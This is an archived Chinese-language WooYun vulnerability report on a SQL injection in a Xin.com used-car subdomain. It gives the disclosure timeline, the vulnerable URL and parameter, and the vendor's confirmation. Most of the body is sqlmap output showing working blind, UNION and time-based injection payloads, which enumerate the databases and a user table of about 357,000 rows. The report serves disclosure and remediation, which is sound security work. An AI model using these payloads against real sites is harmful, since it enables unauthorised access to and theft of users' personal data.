乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-27: 细节已通知厂商并且等待厂商处理中 2015-10-27: 厂商已经确认,细节仅向厂商公开 2015-11-06: 细节向核心白帽子及相关领域专家公开 2015-11-16: 细节向普通白帽子公开 2015-11-26: 细节向实习白帽子公开 2015-12-11: 细节向公众公开
优信二手车某站sql注入漏洞2(可泄漏34万用户信息)
http://huodong.xin.com:8888/ajax/top_load/data:ename=nanjing
Place: POSTParameter: ename Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: ename=nanjing') AND 4097=4097 AND ('EZvb'='EZvb Type: UNION query Title: MySQL UNION query (NULL) - 9 columns Payload: ename=-4045') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7175797071,0x534472585447486b5965,0x7173636c71),NULL,NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: ename=nanjing') AND SLEEP(5) AND ('VCSh'='VCSh---[23:52:58] [INFO] the back-end DBMS is MySQLweb application technology: PHP 5.4.14back-end DBMS: MySQL 5.0.11[23:52:58] [INFO] fetching database names[23:52:58] [INFO] the SQL query used returns 4 entries[23:52:59] [INFO] retrieved: "information_schema"[23:52:59] [INFO] retrieved: "car_model_partner"[23:52:59] [INFO] retrieved: "test"[23:52:59] [INFO] retrieved: "xin"available databases [4]: [*] car_model_partner[*] information_schema[*] test[*] xin
Place: POSTParameter: ename Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: ename=nanjing') AND 4097=4097 AND ('EZvb'='EZvb Type: UNION query Title: MySQL UNION query (NULL) - 9 columns Payload: ename=-4045') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7175797071,0x534472585447486b5965,0x7173636c71),NULL,NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: ename=nanjing') AND SLEEP(5) AND ('VCSh'='VCSh---[23:56:25] [INFO] the back-end DBMS is MySQLweb application technology: PHP 5.4.42back-end DBMS: MySQL 5.0.11Database: xin+--------+---------+| Table | Entries |+--------+---------+| `user` | 357683 |+--------+---------+
危害等级:高
漏洞Rank:10
确认时间:2015-10-27 16:12
谢谢反馈!正协助修复。
暂无